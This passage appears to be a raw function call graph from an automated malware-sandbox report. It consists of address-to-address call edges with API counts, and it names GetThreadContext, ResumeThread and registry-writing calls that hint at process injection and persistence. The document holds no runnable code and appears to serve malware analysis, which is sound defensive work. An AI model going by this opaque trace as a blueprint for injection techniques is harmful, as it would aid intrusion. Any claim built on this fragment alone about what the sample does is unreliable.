API calls 37234->37238 37237 2b089d0 20 API calls 37235->37237 37240 2af4860 11 API calls 37236->37240 37239 2b18914 37237->37239 37243 2b19ecf 37238->37243 37241 2af4860 11 API calls 37239->37241 37246 2b1972f 37240->37246 37245 2b18935 37241->37245 37244 2af47ec 11 API calls 37242->37244 37247 2b089d0 20 API calls 37243->37247 37250 2b17d88 37244->37250 37249 2af47ec 11 API calls 37245->37249 37248 2af47ec 11 API calls 37246->37248 37252 2b19f02 37247->37252 37254 2b19766 37248->37254 37255 2b1896c 37249->37255 37251 2b089d0 20 API calls 37250->37251 37253 2b17dac 37251->37253 37257 2b089d0 20 API calls 37252->37257 37256 2af4860 11 API calls 37253->37256 37258 2b089d0 20 API calls 37254->37258 37260 2b089d0 20 API calls 37255->37260 37266 2b17dcd 37256->37266 37259 2b19f35 37257->37259 37261 2b1978a 37258->37261 37262 2af4860 11 API calls 37259->37262 37263 2b18990 37260->37263 37264 2af4860 11 API calls 37261->37264 37268 2b19f56 37262->37268 37265 2af4860 11 API calls 37263->37265 37270 2b197ab 37264->37270 37269 2b189b1 37265->37269 37267 2af47ec 11 API calls 37266->37267 37274 2b17e04 37267->37274 37271 2af47ec 11 API calls 37268->37271 37272 2af47ec 11 API calls 37269->37272 37273 2af47ec 11 API calls 37270->37273 37276 2b19f8d 37271->37276 37279 2b189e8 37272->37279 37278 2b197e2 37273->37278 37275 2b089d0 20 API calls 37274->37275 37277 2b17e28 37275->37277 37281 2b089d0 20 API calls 37276->37281 38196 2b05aec 42 API calls 37277->38196 37283 2b089d0 20 API calls 37278->37283 37285 2b089d0 20 API calls 37279->37285 37284 2b19fb1 37281->37284 37287 2b19806 37283->37287 37288 2af4860 11 API calls 37284->37288 37289 2b18a0c 37285->37289 37286 2b17e54 37294 2af4bcc 11 API calls 37286->37294 37778 2af7e5c 37287->37778 37300 2b19fd2 37288->37300 38199 2b0d164 23 API calls 37289->38199 37293 2b18a20 37296 2af4860 11 API calls 37293->37296 37297 2b17e69 37294->37297 37295 2b19aef 37299 2af4860 11 API calls 37295->37299 37303 2b18a46 37296->37303 37301 2af4860 11 API calls 37297->37301 37298 2af4860 11 API calls 37305 2b19839 37298->37305 37304 2b19b10 37299->37304 37302 2af47ec 11 API calls 37300->37302 37307 2b17e8a 37301->37307 37310 2b1a009 37302->37310 37306 2af47ec 11 API calls 37303->37306 37309 2af47ec 11 API calls 37304->37309 37308 2af47ec 11 API calls 37305->37308 37314 2b18a7d 37306->37314 37311 2af47ec 11 API calls 37307->37311 37315 2b19870 37308->37315 37316 2b19b47 37309->37316 37312 2b089d0 20 API calls 37310->37312 37318 2b17ec1 37311->37318 37313 2b1a02d 37312->37313 37317 2af4860 11 API calls 37313->37317 37319 2b089d0 20 API calls 37314->37319 37320 2b089d0 20 API calls 37315->37320 37321 2b089d0 20 API calls 37316->37321 37330 2b1a04e 37317->37330 37323 2b089d0 20 API calls 37318->37323 37322 2b18aa1 37319->37322 37324 2b19894 37320->37324 37325 2b19b6b 37321->37325 37326 2af4860 11 API calls 37322->37326 37327 2b17ee5 37323->37327 37328 2af4860 11 API calls 37324->37328 37329 2af4860 11 API calls 37325->37329 37333 2b18ac2 37326->37333 37332 2af49f8 11 API calls 37327->37332 37335 2b198b5 37328->37335 37336 2b19b8c 37329->37336 37331 2af47ec 11 API calls 37330->37331 37340 2b1a085 37331->37340 37334 2b17f02 37332->37334 37337 2af47ec 11 API calls 37333->37337 38197 2b07e50 17 API calls 37334->38197 37342 2af47ec 11 API calls 37335->37342 37339 2af47ec 11 API calls 37336->37339 37345 2b18af9 37337->37345 37347 2b19bc3 37339->37347 37344 2b089d0 20 API calls 37340->37344 37341 2b17f08 37343 2af4860 11 API calls 37341->37343 37346 2b198ec 37342->37346 37348 2b17f29 37343->37348 37352 2b1a0a9 37344->37352 37349 2b089d0 20 API calls 37345->37349 37350 2b089d0 20 API calls 37346->37350 37351 2b089d0 20 API calls 37347->37351 37354 2af47ec 11 API calls 37348->37354 37353 2b18b1d 37349->37353 37355 2b19910 37350->37355 37356 2b19be7 37351->37356 37360 2b089d0 20 API calls 37352->37360 37357 2af4860 11 API calls 37353->37357 37361 2b17f60 37354->37361 37358 2af4860 11 API calls 37355->37358 37359 2af4860 11 API calls 37356->37359 37362 2b18b3e 37357->37362 37363 2b19931 37358->37363 37364 2b19c08 37359->37364 37365 2b1a0dc 37360->37365 37366 2b089d0 20 API calls 37361->37366 37367 2af47ec 11 API calls 37362->37367 37369 2af47ec 11 API calls 37363->37369 37370 2af47ec 11 API calls 37364->37370 37371 2b089d0 20 API calls 37365->37371 37368 2b17f84 37366->37368 37373 2b18b75 37367->37373 37372 2af4860 11 API calls 37368->37372 37374 2b19968 37369->37374 37375 2b19c3f 37370->37375 37376 2b1a10f 37371->37376 37377 2b17fa5 37372->37377 37378 2b089d0 20 API calls 37373->37378 37379 2b089d0 20 API calls 37374->37379 37380 2b089d0 20 API calls 37375->37380 37381 2b089d0 20 API calls 37376->37381 37383 2af47ec 11 API calls 37377->37383 37382 2b18b99 37378->37382 37384 2b1998c 37379->37384 37385 2b19c63 37380->37385 37393 2b1a142 37381->37393 37386 2b18ba2 37382->37386 37387 2b18bb9 37382->37387 37394 2b17fdc 37383->37394 37388 2b0e358 11 API calls 37384->37388 37389 2af4860 11 API calls 37385->37389 38200 2b08730 17 API calls 37386->38200 37391 2af4860 11 API calls 37387->37391 37392 2b199a1 37388->37392 37398 2b19c84 37389->37398 37400 2b18bda 37391->37400 37395 2af4530 11 API calls 37392->37395 37399 2b089d0 20 API calls 37393->37399 37401 2b089d0 20 API calls 37394->37401 37396 2b199b1 37395->37396 37397 2af4860 11 API calls 37396->37397 37406 2b199d2 37397->37406 37403 2af47ec 11 API calls 37398->37403 37407 2b1a175 37399->37407 37404 2af47ec 11 API calls 37400->37404 37402 2b18000 37401->37402 37405 2af4860 11 API calls 37402->37405 37408 2b19cbb 37403->37408 37410 2b18c11 37404->37410 37413 2b18021 37405->37413 37411 2af47ec 11 API calls 37406->37411 37409 2b089d0 20 API calls 37407->37409 37414 2b089d0 20 API calls 37408->37414 37412 2b1a1a8 37409->37412 37416 2b089d0 20 API calls 37410->37416 37420 2b19a09 37411->37420 37415 2af4860 11 API calls 37412->37415 37417 2af47ec 11 API calls 37413->37417 37418 2b19cdf 37414->37418 37426 2b1a1c9 37415->37426 37419 2b18c35 37416->37419 37427 2b18058 37417->37427 37421 2af49f8 11 API calls 37418->37421 37422 2af4860 11 API calls 37419->37422 37424 2b089d0 20 API calls 37420->37424 37423 2b19ce9 37421->37423 37431 2b18c56 37422->37431 37782 2b08d70 37423->37782 37428 2b19a2d 37424->37428 37430 2af47ec 11 API calls 37426->37430 37432 2b089d0 20 API calls 37427->37432 37429 2af4860 11 API calls 37428->37429 37436 2b19a4e 37429->37436 37437 2b1a200 37430->37437 37434 2af47ec 11 API calls 37431->37434 37433 2b1807c 37432->37433 37435 2af4860 11 API calls 37433->37435 37438 2b18c8d 37434->37438 37441 2b1809d 37435->37441 37439 2af47ec 11 API calls 37436->37439 37440 2b089d0 20 API calls 37437->37440 37444 2b089d0 20 API calls 37438->37444 37447 2b19a85 37439->37447 37442 2b1a224 37440->37442 37446 2af47ec 11 API calls 37441->37446 37443 2af4860 11 API calls 37442->37443 37450 2b1a245 37443->37450 37445 2b18cb1 37444->37445 37448 2af4860 11 API calls 37445->37448 37451 2b180d4 37446->37451 37449 2b089d0 20 API calls 37447->37449 37453 2b18cd2 37448->37453 37459 2b19aa9 37449->37459 37452 2af47ec 11 API calls 37450->37452 37454 2b089d0 20 API calls 37451->37454 37458 2b1a27c 37452->37458 37456 2af47ec 11 API calls 37453->37456 37455 2b180f8 37454->37455 38198 2b0b118 39 API calls 37455->38198 37462 2b18d09 37456->37462 37461 2b089d0 20 API calls 37458->37461 37460 2b0dc8c 17 API calls 37459->37460 37460->37295 37466 2b1a2a0 37461->37466 37464 2b089d0 20 API calls 37462->37464 37463 2b18109 37465 2b18d2d ResumeThread 37464->37465 37467 2af4860 11 API calls 37465->37467 37468 2b089d0 20 API calls 37466->37468 37471 2b18d59 37467->37471 37469 2b1a2d3 37468->37469 37470 2af4860 11 API calls 37469->37470 37473 2b1a2f4 37470->37473 37472 2af47ec 11 API calls 37471->37472 37475 2b18d90 37472->37475 37474 2af47ec 11 API calls 37473->37474 37479 2b1a32b 37474->37479 37476 2b089d0 20 API calls 37475->37476 37477 2b18db4 37476->37477 37478 2af4860 11 API calls 37477->37478 37483 2b18dd5 37478->37483 37480 2b089d0 20 API calls 37479->37480 37481 2b1a34f 37480->37481 37482 2af4860 11 API calls 37481->37482 37485 2b1a370 37482->37485 37484 2af47ec 11 API calls 37483->37484 37487 2b18e0c 37484->37487 37486 2af47ec 11 API calls 37485->37486 37490 2b1a3a7 37486->37490 37488 2b089d0 20 API calls 37487->37488 37489 2b18e30 37488->37489 37491 2af4860 11 API calls 37489->37491 37492 2b089d0 20 API calls 37490->37492 37495 2b18e51 37491->37495 37493 2b1a3cb 37492->37493 37494 2af4860 11 API calls 37493->37494 37497 2b1a3ec 37494->37497 37496 2af47ec 11 API calls 37495->37496 37499 2b18e88 37496->37499 37498 2af47ec 11 API calls 37497->37498 37502 2b1a423 37498->37502 37500 2b089d0 20 API calls 37499->37500 37501 2b18eac CloseHandle 37500->37501 37503 2af4860 11 API calls 37501->37503 37504 2b089d0 20 API calls 37502->37504 37505 2b18ed8 37503->37505 37506 2b1a447 37504->37506 37507 2af47ec 11 API calls 37505->37507 37508 2b089d0 20 API calls 37506->37508 37509 2b18f0f 37507->37509 37510 2b1a47a 37508->37510 37511 2b089d0 20 API calls 37509->37511 37513 2b089d0 20 API calls 37510->37513 37512 2b18f33 37511->37512 37514 2af4860 11 API calls 37512->37514 37515 2b1a4ad 37513->37515 37516 2b18f54 37514->37516 37518 2b089d0 20 API calls 37515->37518 37517 2af47ec 11 API calls 37516->37517 37520 2b18f8b 37517->37520 37519 2b1a4e0 37518->37519 37521 2b089d0 20 API calls 37519->37521 37522 2b089d0 20 API calls 37520->37522 37523 2b1a513 37521->37523 37524 2b18faf 37522->37524 37525 2af4860 11 API calls 37523->37525 37526 2af4860 11 API calls 37524->37526 37527 2b1a534 37525->37527 37528 2b18fd0 37526->37528 37529 2af47ec 11 API calls 37527->37529 37530 2af47ec 11 API calls 37528->37530 37531 2b1a56b 37529->37531 37532 2b19007 37530->37532 37533 2b089d0 20 API calls 37531->37533 37534 2b089d0 20 API calls 37532->37534 37535 2b1a58f 37533->37535 37536 2b1902b 37534->37536 37537 2af4860 11 API calls 37535->37537 37538 2af4860 11 API calls 37536->37538 37539 2b1a5b0 37537->37539 37540 2b1904c 37538->37540 37541 2af47ec 11 API calls 37539->37541 37542 2af47ec 11 API calls 37540->37542 37544 2b1a5e7 37541->37544 37543 2b19083 37542->37543 37546 2b089d0 20 API calls 37543->37546 37545 2b089d0 20 API calls 37544->37545 37549 2b1a60b 37545->37549 37547 2b190a7 37546->37547 37548 2af4860 11 API calls 37547->37548 37551 2b190c8 37548->37551 37550 2b089d0 20 API calls 37549->37550 37553 2b1a63e 37550->37553 37552 2af47ec 11 API calls 37551->37552 37555 2b190ff 37552->37555 37554 2b089d0 20 API calls 37553->37554 37558 2b1a671 37554->37558 37556 2b089d0 20 API calls 37555->37556 37557 2b19123 37556->37557 37559 2af4860 11 API calls 37557->37559 37560 2b089d0 20 API calls 37558->37560 37561 2b19144 37559->37561 37562 2b1a6a4 37560->37562 37563 2af47ec 11 API calls 37561->37563 37564 2b089d0 20 API calls 37562->37564 37565 2b1917b 37563->37565 37566 2b1a6d7 37564->37566 37567 2b089d0 20 API calls 37565->37567 37570 2b089d0 20 API calls 37566->37570 37568 2b1919f 37567->37568 37569 2af4860 11 API calls 37568->37569 37573 2b191c0 37569->37573 37571 2b1a70a 37570->37571 37572 2af4860 11 API calls 37571->37572 37574 2b1a72b 37572->37574 37575 2af47ec 11 API calls 37573->37575 37576 2af47ec 11 API calls 37574->37576 37577 2b191f7 37575->37577 37578 2b1a762 37576->37578 37579 2b089d0 20 API calls 37577->37579 37581 2b089d0 20 API calls 37578->37581 37580 2b1921b 37579->37580 37583 2b0894c 21 API calls 37580->37583 37582 2b1a786 37581->37582 37584 2af4860 11 API calls 37582->37584 37585 2b1923a 37583->37585 37588 2b1a7a7 37584->37588 37586 2b0894c 21 API calls 37585->37586 37587 2b1924e 37586->37587 37589 2b0894c 21 API calls 37587->37589 37591 2af47ec 11 API calls 37588->37591 37590 2b19262 37589->37590 37592 2b0894c 21 API calls 37590->37592 37596 2b1a7de 37591->37596 37593 2b19276 37592->37593 37594 2b0894c 21 API calls 37593->37594 37595 2b1928a 37594->37595 37597 2b0894c 21 API calls 37595->37597 37599 2b089d0 20 API calls 37596->37599 37598 2b1929e CloseHandle 37597->37598 37600 2af4860 11 API calls 37598->37600 37601 2b1a802 37599->37601 37603 2b192ca 37600->37603 37602 2af4860 11 API calls 37601->37602 37604 2b1a823 37602->37604 37605 2af47ec 11 API calls 37603->37605 37606 2af47ec 11 API calls 37604->37606 37607 2b19301 37605->37607 37608 2b1a85a 37606->37608 37609 2b089d0 20 API calls 37607->37609 37611 2b089d0 20 API calls 37608->37611 37610 2b19325 37609->37610 37612 2af4860 11 API calls 37610->37612 37613 2b1a87e 37611->37613 37615 2b19346 37612->37615 37614 2af4860 11 API calls 37613->37614 37617 2b1a89f 37614->37617 37616 2af47ec 11 API calls 37615->37616 37619 2b1937d 37616->37619 37618 2af47ec 11 API calls 37617->37618 37620 2b1a8d6 37618->37620 37621 2b089d0 20 API calls 37619->37621 37622 2b089d0 20 API calls 37620->37622 37621->37078 37623 2b1a8fa 37622->37623 37624 2af4860 11 API calls 37623->37624 37625 2b1a91b 37624->37625 37626 2af47ec 11 API calls 37625->37626 37627 2b1a952 37626->37627 37628 2b089d0 20 API calls 37627->37628 37629 2b1a976 37628->37629 37630 2b089d0 20 API calls 37629->37630 37631 2b1a985 37630->37631 37632 2b089d0 20 API calls 37631->37632 37633 2b1a994 37632->37633 37634 2b089d0 20 API calls 37633->37634 37635 2b1a9a3 37634->37635 37636 2b089d0 20 API calls 37635->37636 37637 2b1a9b2 37636->37637 37638 2b089d0 20 API calls 37637->37638 37639 2b1a9c1 37638->37639 37640 2b089d0 20 API calls 37639->37640 37641 2b1a9d0 37640->37641 37642 2b089d0 20 API calls 37641->37642 37643 2b1a9df 37642->37643 37644 2b089d0 20 API calls 37643->37644 37645 2b1a9ee 37644->37645 37646 2b089d0 20 API calls 37645->37646 37647 2b1a9fd 37646->37647 37648 2b089d0 20 API calls 37647->37648 37649 2b1aa0c 37648->37649 37650 2b089d0 20 API calls 37649->37650 37651 2b1aa1b 37650->37651 37652 2b089d0 20 API calls 37651->37652 37653 2b1aa2a 37652->37653 37654 2b089d0 20 API calls 37653->37654 37655 2b1aa39 37654->37655 37656 2b089d0 20 API calls 37655->37656 37657 2b1aa48 37656->37657 37658 2b089d0 20 API calls 37657->37658 37659 2b1aa57 37658->37659 37660 2af4860 11 API calls 37659->37660 37661 2b1aa78 37660->37661 37662 2af47ec 11 API calls 37661->37662 37663 2b1aaaf 37662->37663 37664 2b089d0 20 API calls 37663->37664 37665 2b1aad3 37664->37665 37666 2b089d0 20 API calls 37665->37666 37667 2b1ab06 37666->37667 37668 2b089d0 20 API calls 37667->37668 37669 2b1ab39 37668->37669 37670 2b089d0 20 API calls 37669->37670 37671 2b1ab6c 37670->37671 37672 2b089d0 20 API calls 37671->37672 37673 2b1ab9f 37672->37673 37674 2b089d0 20 API calls 37673->37674 37675 2b1abd2 37674->37675 37676 2b089d0 20 API calls 37675->37676 37677 2b1ac05 37676->37677 37678 2b089d0 20 API calls 37677->37678 37679 2b1ac38 37678->37679 37680 2af4860 11 API calls 37679->37680 37681 2b1ac59 37680->37681 37682 2af47ec 11 API calls 37681->37682 37683 2b1ac90 37682->37683 37684 2b089d0 20 API calls 37683->37684 37685 2b1acb4 37684->37685 37686 2af4860 11 API calls 37685->37686 37687 2b1acd5 37686->37687 37688 2af47ec 11 API calls 37687->37688 37689 2b1ad0c 37688->37689 37690 2b089d0 20 API calls 37689->37690 37691 2b1ad30 37690->37691 37692 2af4860 11 API calls 37691->37692 37693 2b1ad51 37692->37693 37694 2af47ec 11 API calls 37693->37694 37695 2b1ad88 37694->37695 37696 2b089d0 20 API calls 37695->37696 37697 2b1adac 37696->37697 37698 2b089d0 20 API calls 37697->37698 37699 2b1addf 37698->37699 37700 2b089d0 20 API calls 37699->37700 37701 2b1ae12 37700->37701 37702 2b089d0 20 API calls 37701->37702 37703 2b1ae45 37702->37703 37704 2b089d0 20 API calls 37703->37704 37705 2b1ae78 37704->37705 37706 2b089d0 20 API calls 37705->37706 37707 2b1aeab 37706->37707 37708 2b089d0 20 API calls 37707->37708 37709 2b1aede 37708->37709 37710 2b089d0 20 API calls 37709->37710 37711 2b1af11 37710->37711 37712 2b089d0 20 API calls 37711->37712 37713 2b1af44 37712->37713 37714 2b089d0 20 API calls 37713->37714 37715 2b1af77 37714->37715 37716 2b089d0 20 API calls 37715->37716 37717 2b1afaa 37716->37717 37718 2b089d0 20 API calls 37717->37718 37719 2b1afdd 37718->37719 37720 2b089d0 20 API calls 37719->37720 37721 2b1b010 37720->37721 37722 2b089d0 20 API calls 37721->37722 37723 2b1b043 37722->37723 37724 2b089d0 20 API calls 37723->37724 37725 2b1b076 37724->37725 37726 2b089d0 20 API calls 37725->37726 37727 2b1b0a9 37726->37727 37728 2b089d0 20 API calls 37727->37728 37729 2b1b0dc 37728->37729 37730 2b089d0 20 API calls 37729->37730 37731 2b1b10f 37730->37731 37732 2b089d0 20 API calls 37731->37732 37733 2b1b142 37732->37733 37734 2b089d0 20 API calls 37733->37734 37735 2b1b175 37734->37735 37736 2b08338 18 API calls 37735->37736 37737 2b1b184 37736->37737 37738 2af4860 11 API calls 37737->37738 37739 2b1b1a5 37738->37739 37740 2af47ec 11 API calls 37739->37740 37741 2b1b1dc 37740->37741 37742 2b089d0 20 API calls 37741->37742 37743 2b1b200 37742->37743 37744 2af4860 11 API calls 37743->37744 37745 2b1b221 37744->37745 37746 2af47ec 11 API calls 37745->37746 37747 2b1b258 37746->37747 37748 2b089d0 20 API calls 37747->37748 37749 2b1b27c 37748->37749 37750 2af4860 11 API calls 37749->37750 37751 2b1b29d 37750->37751 37752 2af47ec 11 API calls 37751->37752 37753 2b1b2d4 37752->37753 37754 2b089d0 20 API calls 37753->37754 37755 2b1b2f8 ExitProcess 37754->37755 37762 2b0e114 37756->37762 37757 2b0e197 37758 2af44dc 11 API calls 37757->37758 37759 2b0e19f 37758->37759 37761 2af4530 11 API calls 37759->37761 37760 2af49f8 11 API calls 37760->37762 37763 2b0e1aa 37761->37763 37762->37757 37762->37760 37764 2af4500 11 API calls 37763->37764 37765 2b0e1c4 37764->37765 37765->36969 37767 2b0f22b 37766->37767 37768 2b0f256 RegOpenKeyA 37767->37768 37769 2b0f264 37768->37769 37770 2af49f8 11 API calls 37769->37770 37771 2b0f27c 37770->37771 37772 2b0f289 RegSetValueExA RegCloseKey 37771->37772 37773 2b0f2ad 37772->37773 37774 2af4500 11 API calls 37773->37774 37775 2b0f2ba 37774->37775 37776 2af44dc 11 API calls 37775->37776 37777 2b0f2c2 37776->37777 37777->36972 38201 2af49a0 37778->38201 37781 2af7e71 37781->37295 37781->37298 37783 2b08d78 37782->37783 37784 2af4860 11 API calls 37783->37784 37785 2b08dbb 37784->37785 37786 2af47ec 11 API calls 37785->37786 37787 2b08de0 37786->37787 37788 2b089d0 20 API calls 37787->37788 37789 2b08dfb 37788->37789 37790 2af4860 11 API calls 37789->37790 37791 2b08e14 37790->37791 37792 2af47ec 11 API calls 37791->37792 37793 2b08e39 37792->37793 37794 2b089d0 20 API calls 37793->37794 37795 2b08e54 37794->37795 37796 2b0a8b7 37795->37796 37797 2af4860 11 API calls 37795->37797 37798 2af4500 11 API calls 37796->37798 37802 2b08e85 37797->37802 37799 2b0a8d4 37798->37799 37800 2af4500 11 API calls 37799->37800 37801 2b0a8e4 37800->37801 37803 2af4c60 SysFreeString 37801->37803 37805 2af47ec 11 API calls 37802->37805 37804 2b0a8ef 37803->37804 37806 2af4500 11 API calls 37804->37806 37809 2b08eaa 37805->37809 37807 2b0a8ff 37806->37807 37808 2af44dc 11 API calls 37807->37808 37810 2b0a907 37808->37810 37812 2b089d0 20 API calls 37809->37812 37811 2af4500 11 API calls 37810->37811 37813 2b0a914 37811->37813 37814 2b08ec5 37812->37814 37815 2af4500 11 API calls 37813->37815 37817 2af4860 11 API calls 37814->37817 37816 2b0a921 37815->37816 37816->37140 37818 2b08ede 37817->37818 37819 2af47ec 11 API calls 37818->37819 37820 2b08f03 37819->37820 37821 2b089d0 20 API calls 37820->37821 37822 2b08f1e 37821->37822 37822->37796 37823 2af4860 11 API calls 37822->37823 37824 2b08f66 37823->37824 37825 2af47ec 11 API calls 37824->37825 37826 2b08f8b 37825->37826 37827 2b089d0 20 API calls 37826->37827 37828 2b08fa6 37827->37828 37829 2af4860 11 API calls 37828->37829 37830 2b08fbf 37829->37830 37831 2af47ec 11 API calls 37830->37831 37832 2b08fe4 37831->37832 37833 2b089d0 20 API calls 37832->37833 37834 2b08fff 37833->37834 37835 2af4860 11 API calls 37834->37835 37836 2b09044 37835->37836 37837 2af47ec 11 API calls 37836->37837 37838 2b09069 37837->37838 37839 2b089d0 20 API calls 37838->37839 37840 2b09084 37839->37840 37841 2af4860 11 API calls 37840->37841 37842 2b0909d 37841->37842 37843 2af47ec 11 API calls 37842->37843 37844 2b090c5 37843->37844 37845 2b089d0 20 API calls 37844->37845 37846 2b090e3 37845->37846 37847 2af4860 11 API calls 37846->37847 37848 2b090ff 37847->37848 37849 2af47ec 11 API calls 37848->37849 37850 2b09130 37849->37850 37851 2b089d0 20 API calls 37850->37851 37852 2b09154 37851->37852 37853 2af4860 11 API calls 37852->37853 37854 2b09170 37853->37854 37855 2af47ec 11 API calls 37854->37855 37856 2b091a1 37855->37856 37857 2b089d0 20 API calls 37856->37857 37858 2b091c5 37857->37858 37859 2af4860 11 API calls 37858->37859 37860 2b091e1 37859->37860 37861 2af47ec 11 API calls 37860->37861 37862 2b09212 37861->37862 37863 2b089d0 20 API calls 37862->37863 37864 2b09236 37863->37864 37865 2b08788 18 API calls 37864->37865 37866 2b09273 37865->37866 37867 2b092e8 37866->37867 37868 2af4860 11 API calls 37866->37868 37869 2af4860 11 API calls 37867->37869 37871 2b09293 37868->37871 37870 2b09304 37869->37870 37872 2af47ec 11 API calls 37870->37872 37873 2af47ec 11 API calls 37871->37873 37874 2b09335 37872->37874 37875 2b092c4 37873->37875 37876 2b089d0 20 API calls 37874->37876 37877 2b089d0 20 API calls 37875->37877 37878 2b09359 37876->37878 37877->37867 37879 2b089d0 20 API calls 37878->37879 37880 2b0938c 37879->37880 37881 2af4860 11 API calls 37880->37881 37882 2b093a8 37881->37882 37883 2af47ec 11 API calls 37882->37883 37884 2b093d9 37883->37884 37885 2b089d0 20 API calls 37884->37885 37886 2b093fd 37885->37886 37887 2af4860 11 API calls 37886->37887 37888 2b09419 37887->37888 37889 2af47ec 11 API calls 37888->37889 37890 2b0944a 37889->37890 37891 2b089d0 20 API calls 37890->37891 37892 2b0946e 37891->37892 37893 2af2ee0 2 API calls 37892->37893 37894 2b09473 37893->37894 37895 2af4860 11 API calls 37894->37895 37896 2b094b6 37895->37896 37897 2af47ec 11 API calls 37896->37897 37898 2b094e7 37897->37898 37899 2b089d0 20 API calls 37898->37899 37900 2b0950b 37899->37900 37901 2af4860 11 API calls 37900->37901 37902 2b09527 37901->37902 37903 2af47ec 11 API calls 37902->37903 37904 2b09558 37903->37904 37905 2b089d0 20 API calls 37904->37905 37906 2b0957c 37905->37906 37907 2af4860 11 API calls 37906->37907 37908 2b09598 37907->37908 37909 2af47ec 11 API calls 37908->37909 37910 2b095c9 37909->37910 37911 2b089d0 20 API calls 37910->37911 37912 2b095ed GetThreadContext 37911->37912 37912->37796 37913 2b0960f 37912->37913 37914 2af4860 11 API calls 37913->37914 37915 2b0962b 37914->37915 37916 2af47ec 11 API calls 37915->37916 37917 2b0965c 37916->37917 37918 2b089d0 20 API calls 37917->37918 37919 2b09680 37918->37919 37920 2af4860 11 API calls 37919->37920 37921 2b0969c 37920->37921 37922 2af47ec 11 API calls 37921->37922 37923 2b096cd 37922->37923 37924 2b089d0 20 API calls 37923->37924 37925 2b096f1 37924->37925 37926 2af4860 11 API calls 37925->37926 37927 2b0970d 37926->37927 37928 2af47ec 11 API calls 37927->37928 37929 2b0973e 37928->37929 37930 2b089d0 20 API calls 37929->37930 37931 2b09762 37930->37931 37932 2af4860 11 API calls 37931->37932 37933 2b0977e 37932->37933 37934 2af47ec 11 API calls 37933->37934 37935 2b097af 37934->37935 37936 2b089d0 20 API calls 37935->37936 37937 2b097d3 37936->37937 37938 2af4860 11 API calls 37937->37938 37939 2b097ef 37938->37939 37940 2af47ec 11 API calls 37939->37940 37941 2b09820 37940->37941 37942 2b089d0 20 API calls 37941->37942 37943 2b09844 37942->37943 38203 2b08400 37943->38203 37946 2b09878 37949 2af4860 11 API calls 37946->37949 37947 2b09b7f 37948 2af4860 11 API calls 37947->37948 37950 2b09b9b 37948->37950 37951 2b09894 37949->37951 37952 2af47ec 11 API calls 37950->37952 37953 2af47ec 11 API calls 37951->37953 37955 2b09bcc 37952->37955 37954 2b098c5 37953->37954 37956 2b089d0 20 API calls 37954->37956 37957 2b089d0 20 API calls 37955->37957 37959 2b098e9 37956->37959 37958 2b09b78 37957->37958 37960 2af4860 11 API calls 37958->37960 37961 2af4860 11 API calls 37959->37961 37962 2b09c0c 37960->37962 37963 2b09905 37961->37963 37964 2af47ec 11 API calls 37962->37964 37965 2af47ec 11 API calls 37963->37965 37966 2b09c3d 37964->37966 37967 2b09936 37965->37967 37969 2b089d0 20 API calls 37966->37969 37968 2b089d0 20 API calls 37967->37968 37970 2b0995a 37968->37970 37971 2b09c61 37969->37971 37972 2af4860 11 API calls 37970->37972 37973 2af4860 11 API calls 37971->37973 37975 2b09976 37972->37975 37974 2b09c7d 37973->37974 37976 2af47ec 11 API calls 37974->37976 37977 2af47ec 11 API calls 37975->37977 37978 2b09cae 37976->37978 37979 2b099a7 37977->37979 37980 2b089d0 20 API calls 37978->37980 37981 2b089d0 20 API calls 37979->37981 37982 2b09cd2 37980->37982 37983 2b099cb 37981->37983 37985 2af4860 11 API calls 37982->37985 38217 2b08670 37983->38217 37991 2b09cee 37985->37991 37987 2b099e3 37989 2b07a2c 18 API calls 37987->37989 37988 2b09a0b 37990 2af4860 11 API calls 37988->37990 37992 2b09a04 37989->37992 37995 2b09a27 37990->37995 37993 2af47ec 11 API calls 37991->37993 37994 2af4860 11 API calls 37992->37994 37997 2b09d1f 37993->37997 37998 2b09a98 37994->37998 37996 2af47ec 11 API calls 37995->37996 38001 2b09a58 37996->38001 37999 2b089d0 20 API calls 37997->37999 38000 2af47ec 11 API calls 37998->38000 38002 2b09d43 37999->38002 38006 2b09ac9 38000->38006 38004 2b089d0 20 API calls 38001->38004 38003 2b07a2c 18 API calls 38002->38003 38005 2b09d64 38003->38005 38004->37992 38005->37796 38007 2af4860 11 API calls 38005->38007 38008 2b089d0 20 API calls 38006->38008 38011 2b09d92 38007->38011 38009 2b09aed 38008->38009 38010 2af4860 11 API calls 38009->38010 38013 2b09b09 38010->38013 38012 2af47ec 11 API calls 38011->38012 38015 2b09dc3 38012->38015 38014 2af47ec 11 API calls 38013->38014 38018 2b09b3a 38014->38018 38016 2b089d0 20 API calls 38015->38016 38017 2b09de7 38016->38017 38019 2af4860 11 API calls 38017->38019 38020 2b089d0 20 API calls 38018->38020 38023 2b09e03 38019->38023 38021 2b09b5e 38020->38021 38231 2b07a2c 38021->38231 38024 2af47ec 11 API calls 38023->38024 38025 2b09e34 38024->38025 38026 2b089d0 20 API calls 38025->38026 38027 2b09e58 38026->38027 38245 2b08c80 38027->38245 38029 2af4860 11 API calls 38031 2b09edf 38029->38031 38030 2b09e5f 38030->38029 38032 2af47ec 11 API calls 38031->38032 38033 2b09f10 38032->38033 38034 2b089d0 20 API calls 38033->38034 38035 2b09f34 38034->38035 38036 2af4860 11 API calls 38035->38036 38037 2b09f50 38036->38037 38038 2af47ec 11 API calls 38037->38038 38039 2b09f81 38038->38039 38040 2b089d0 20 API calls 38039->38040 38041 2b09fa5 38040->38041 38042 2af4860 11 API calls 38041->38042 38043 2b09fc1 38042->38043 38044 2af47ec 11 API calls 38043->38044 38045 2b09ff2 38044->38045 38046 2b089d0 20 API calls 38045->38046 38047 2b0a016 38046->38047 38048 2b07d78 18 API calls 38047->38048 38049 2b0a033 38048->38049 38050 2af4860 11 API calls 38049->38050 38051 2b0a04f 38050->38051 38052 2af47ec 11 API calls 38051->38052 38053 2b0a080 38052->38053 38054 2b089d0 20 API calls 38053->38054 38055 2b0a0a4 38054->38055 38056 2af4860 11 API calls 38055->38056 38057 2b0a0c0 38056->38057 38058 2af47ec 11 API calls 38057->38058 38059 2b0a0f1 38058->38059 38060 2b089d0 20 API calls 38059->38060 38061 2b0a115 38060->38061 38062 2af4860 11 API calls 38061->38062 38063 2b0a131 38062->38063 38064 2af47ec 11 API calls 38063->38064 38065 2b0a162 38064->38065 38066 2b089d0 20 API calls 38065->38066 38067 2b0a186 38066->38067 38068 2b07d78 18 API calls 38067->38068 38069 2b0a1a6 38068->38069 38070 2af4860 11 API calls 38069->38070 38071 2b0a1c2 38070->38071 38072 2af47ec 11 API calls 38071->38072 38073 2b0a1f3 38072->38073 38074 2b089d0 20 API calls 38073->38074 38075 2b0a217 38074->38075 38076 2af4860 11 API calls 38075->38076 38077 